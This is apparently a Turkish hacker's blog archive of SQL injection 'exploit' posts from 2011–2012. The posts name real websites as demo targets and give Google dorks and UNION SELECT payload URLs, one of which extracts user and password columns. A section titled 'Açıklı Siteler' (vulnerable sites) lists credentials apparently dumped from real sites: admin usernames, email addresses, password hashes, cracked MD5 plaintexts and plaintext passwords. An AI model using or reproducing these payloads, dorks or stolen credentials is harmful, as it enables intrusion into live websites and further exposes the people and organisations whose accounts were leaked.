blind sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
blind sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

17 Şubat 2012 Cuma

SibexSystems SQL Injection

####################################################################### 
~ Exploit Title: * SibexSystems SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Vendor : http://sibexsystems.com/

~ Date : 17.02.2012 ~ 

~ Platform : Php ~


####################################################################### 
~ Demo Site :

~ http://www.kashifhafeez.com/reply.php?id=1772 [SQL]

####################################################################### 
~* Virüslerden Önce Akýl Var. 
####################################################################### 

~* Bilinmezlik DiyarinDan

####################################################################### 

~* Olmassa Olmazimdir Bazi seyler.

####################################################################### 

~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in
 
####################################################################### 

~ Darkness Devil,Mugair,MüHüR,Nikolay,Tekfurdagli,Evillord,portechine07
 
#######################################################################       

16 Şubat 2012 Perşembe

IGNITION S.A.R.L. SQL Injection~ Th4 MasK [ Bug Res.]


########################################################

~ Exploit Title: * IGNITION s.a.r.l. SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Software Website: http://www.educomoverseas.com

~ Date : 14.02.2012 ~ 

~ Platform : Php ~

~ Dork : Designed and powered by IGNITION s.a.r.l.

########################################################


~ Demo Site :

~ http://www.educomoverseas.com/summer_camp/details.php?c=223&sc_id=2[SQL]

########################################################

~* Bilinmezlik DiyarinDan

########################################################

~* Olmassa Olmazimdir. Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in
 

########################################################

~ Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
 
######################################################## 
 
http://packetstormsecurity.org/files/109794/IGNITION-S.A.R.L.-SQL-Injection.html 

Xenon Web Services SQL Injection~ Th4 MasK [ Bug Res.]


########################################################

~ Exploit Title: * Xenon Web Services SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Vendor: http://xe.co.za/

~ Date : 14.02.2012 ~ 

~ Platform : Php ~


########################################################


~ Demo Site :

~ www.kawasakisa.co.za/news_details.php?news_id=385 [SQL]

Exploit : 

http://localhost/pview.php?id=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/4,/**/@@version,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14,/**/15,/**/16,/**/17,/**/18,/**/19,/**/20,/**/21,/**/22--

########################################################

~* Bilinmezlik DiyarinDan

########################################################

~* Olmassa Olmazimdir. Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz: http://th4mask.blogspot.com ~  DarkdevilZ.in
 

########################################################

~ Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
 
######################################################## 
 
 
 
http://packetstormsecurity.org/files/109795/Xenon-Web-Services-SQL-Injection.html 

13 Şubat 2012 Pazartesi

Worstpreviews SQL Injection


########################################################

~ Exploit Title: * Worstpreviews  SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Software Website: http://www.worstpreviews.com/

~ Date : 13.02.2012 ~ 

~ Vendor : http://hiregroundsoftware.com/

~ Platform : Php ~

~ Dork : trailer.php?id=

########################################################


~ Demo Site :

~ http://www.worstpreviews.com/trailer.php?id=490[SQL]&item=0

Exploit : 

http://www.worstpreviews.com/trailer.php?id=490+AND+1=2+UNION+SELECT+1,2--

########################################################

~* Bilinmezlik DiyarinDan

########################################################

~* Olmassa Olmazimdir. Bazi seyler.

########################################################

~ Greetz: http://th4mask.blogspot.com ~ 
 

########################################################

~ ZoRRoKiN,Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
 
######################################################## 
~ Contact to ; th4_mask@windowslive.com ~
 
 
http://packetstormsecurity.org/files/109736/Worstpreviews-SQL-Injection.html 

8 Şubat 2012 Çarşamba

Cheshire Web Design SQL Injection ~ Th4 MasK [ Bug Res.]

########################################################
Exploit Title: * Web Design Cheshire SQL Injection *~

AuthorTh4 MasK
Contact to th4_mask@windowslive.com ~

Date 08.02.2012 ~

Vendor :  http://www.cheshirewebdesigners.com/
Platform Php ~
########################################################
Demo Site :

http://www.headseng.co.uk/view-job?whichJob=1182164
Exploit :
http://localhost/listarivisteuk.php?Id?=(id)viewjob.php?id=212/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14--

########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa OlmazimdirBazi seyler.
########################################################
TWS Family
Mugair,Nikolay,Darkness Devil,Tekfurdaðlý
 
TurkWebSecurity.Net  ~  http://th4mask.blogspot.com/

########################################################







http://packetstormsecurity.org/files/109540/Cheshire-Web-Design-SQL-Injection.html

27 Ocak 2012 Cuma

Studio Manolibera Listarivisteuk SQL Injection ~ Th4 MasK [ Bug Res.]

########################################################
Exploit Title: * Listarivisteuk SQL Injection *~

AuthorTh4 MasK
Contact to th4_mask@windowslive.com ~

Date 27.01.2012 ~

Platform Php ~

########################################################
Dorklistarivisteuk.php?Id?=

########################################################
Demo Site :

http://www.fgda.org/listarivisteuk.php?Id=1
Exploit :
http://localhost/listarivisteuk.php?Id?=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/@@version,/**/2--
Poc//
Panel :HTTP://localhost/login.php
User :User_login

Password 
:User_pass


########################################################
~* Bilinmezlik Diyari
########################################################
~* Olmassa OlmazimdirBazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~

Greetzhttp://th4mask.blogspot.com ~ TurkWebSecurity.Net


########################################################
TWS Family
~  Evillord,Mugair,Nikolay,Darkness Devil
 
TurkWebSecurity.Net  ~  http://th4mask.blogspot.com/

########################################################

 
Special Thanx HancHer

19 Ocak 2012 Perşembe

Brand PHP SQL Injection ~ Th4 MasK [ Bug Res.]

########################################################

~ Exploit Title: * Brand PHP SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Date : 19.01.2012 ~ 

~ Platform : Php ~


########################################################

~ Dork: brand.php?id=


########################################################

~ Demo Site :

~ http://www.mirabell.com.hk/brand.php?id=2(SQL)
~  http://www.seikocan.com/brand.php?id=51(SQL)
~ http://www.vmax-services.com/brand.php?id=11(SQL)

########################################################

~* Bilinmezlik Diyari

########################################################

~* Olmassa Olmazýmdýr. Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net 
 

########################################################
 
~ TurkWebSecurity.Net  ~  http://th4mask.blogspot.com/

######################################################## 
 
http://packetstormsecurity.org/files/108833/brandphp-sql.txt 

Fiche Avion SQL Injection ~ Th4 MasK [ Bug Res.]


########################################################

~ Exploit Title: * Fiche Avion SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Date : 19.01.2012 ~ 

~ Platform : Php ~


########################################################

~ Dork: fiche_avion.php?id=


########################################################

~ Demo Site :

~ http://www.mrcmodelisme.com/fiche_avion.php?id=32(SQL)



########################################################

~* Bilinmezlik Diyari

########################################################

~* Olmassa Olmazýmdýr. Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net 
 

########################################################
 
~ TurkWebSecurity.Net  ~  http://th4mask.blogspot.com/

########################################################          
 
 
 
http://packetstormsecurity.org/files/108826/ficheavion-sql.txt 

MaDVideO SQL Injection ~ Th4 MasK [ Bug Res.]

########################################################

~ Exploit Title: * MaDVideO SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Date : 19.01.2012 ~ 

~ Platform : Php ~


########################################################

~ Dork: vis_madvideo.php?id=


########################################################

~ Demo Site :

~ http://www.maduniverset.dk/vis_madvideo.php?id=59 (SQL)



########################################################

~* Bilinmezlik Diyari

########################################################

~* Olmassa Olmazýmdýr. Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz: http://th4mask.blogspot.com ~ TurkWebSecurity.Net 
 

########################################################
 
~ TurkWebSecurity.Net  ~  http://th4mask.blogspot.com/

######################################################## 
 
http://packetstormsecurity.org/files/108825/madvideo-sql.txt 

Açıklı Siteler :)

http://www.laprepa.edu.gt

password
+------------------------------------+
$1$TJ4.gi2.$TVTMWeA4/Jb2xphooU65C1
la0P/yBbQzQM.
$1$TJ4.gi2.$TVTMWeA4/Jb2xphooU65C1
+------------------------------------+
+---------------+
nombre
+---------------+
Webmaster
laprepa
Administrador
+---------------+
+------------------+
email
+------------------+
info@fiomega.com


+------------------+

---------------------------------------------------------------------------------
http://www.su.edu.eg
[1] admin:admin:admin@site.com
----------------------------------------------------------------------------------------
[+] URL: http://peninsulardeinstalaciones.es/inde...darkc0de,5

['login', 'password']


[1] asturbuproadmin:adminpass:
------------------------------------------------------------------------------------
[+] URL: http://www.mcaleesemarine.com/boat-spec....4,65,66,67


[1] rjsinton:d070408473f135d01eac0025b7b97f77:
[2] bobsinton:d070408473f135d01eac0025b7b97f77:
[3] mcaleese:14da5176cbf075e320f2b6a27215a459:
d070408473f135d01eac0025b7b97f77 MD5 : trebor01
d070408473f135d01eac0025b7b97f77 MD5 : trebor01
14da5176cbf075e320f2b6a27215a459 MD5 : mercury01

---------------------------------------------------------------------------------------
----------+----------------------------------+
| login | password |
+----------+----------------------------------+
| adm_2010 | e66335ca1d98f5ed9923832da0a62c78 |
+----------+----------------------------------+
http://www.ctvc.cc/visas_desc.php?id=2

------------------------------------------------------------------------------
[+] URL: http://rdevack.com/practice_areas_detail...c0de,11,12

[1] goldcoast:79c3cdf740f66a54dc8187d1b72939424e64be08:
[2] rdevack:3af3306df9b8aca3e84d76c227770a2e3ca41fb9:

------------------------------------------------------------------------------

http://www.kinderworld.net/kinderworld/k...19,20,21--
http://www.kinderworld.net/kinderworld/k.../index.php

[1] Admin:stephen.see@kinderworldgroup.com:123:
[2] hieu:hieu.nguyenquy@kinderworldgroup.com:d7981337247a6a08503eccdae26422c1:dE2C43​C06aP18NFIW6X32JdnpFoK1TVU:
[3] huy:huy.quanthe@kinderworldgroup.com:310e14edd53a0ec4b6c0e0aa318077a1:ReDnEoaSLZ​yrWOFEFz6DYcLBg3fKEJlm:




-----------------------------------------------------------------------
http://www.facegis.com


[1] admin:dikakana:
[2] nu:dikakana:

16 Ocak 2012 Pazartesi

Bir Kaç Bug.

BPTSoft Web Solution Group SQL Injection

Dork = site:.ir intext:Copyright 2005-2009 BPTSoft Web Solution Group 

YABSoft Advanced Image Hosting Script SQL Injection
 
Dork = view_comments.php?gal=
 
Kullanıcagınız Yöntem = view_comments.php?gal= 
union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) 
FROM users-- 
 
Joomla Contushdvideoshare SQL Injection
 
Dork = com_contushdvideoshare  


4 Ocak 2012 Çarşamba

Logement Laval SQL Injection ~ Th4 MasK [ Bug Res.]

#######################################################

~ Exploit Title: * Logement Laval SQL Injection *~ 

~ Author: Th4 MasK 

~ Contact to ; th4_mask@windowslive.com ~

~ Date : 04.01.2012 ~ 

~ Platform : Php ~


########################################################

~ Google Dork: logement_laval_location.php?id=


########################################################

~ Demo Site :

~ hhttp://www.meduane-habitat.fr/logement_laval_location.php?id=131(SQL)


~ Panel = http://localhost/admin

~ ÞÝfre Ve Ad = passe , nom

########################################################

~* Bilinmezlik Diyari

########################################################

~* Olmassa Olmazdir Bazi seyler.

########################################################

~* Email:th4_mask@windowslive.com~ 

~ Greetz:http://th4mask.blogspot.com/
 

########################################################
 

~ TurkWebSecurity  ~  http://th4mask.blogspot.com/

######################################################## 
 
 
http://packetstormsecurity.org/files/108344/logementlaval-sql.txt
                 

9 Aralık 2011 Cuma

Ficha Blind SQL Injection

######################################### 

Exploit Title: * Ficha  Blind SQL Injection*


Google Dorkinurl:"ficha.php?id="


AuthorTh4 MasK



Tested on: *Apache/2.3.3*


Date :09.12.2011 


Platform Php


#########################################
 
Demos Site :http://www.nibbledpencil.com/ficha.php?id=336'a


http://www.eurozinco.com/en/ficha.php?id=11'a


http://www.filmfactoryentertainment.com/ficha.php?id=61'a


######################################## 


Land of uncertainty
######################################## 


Contact:th4_mask@windowslive.com


Greetz:http://www.turkhackteam.net  ~ http://th4mask.blogspot.com/


ZoRRoKiN Margu Gezginler The Levis 




########################################  


Th4 MasK ~ Bug  Res.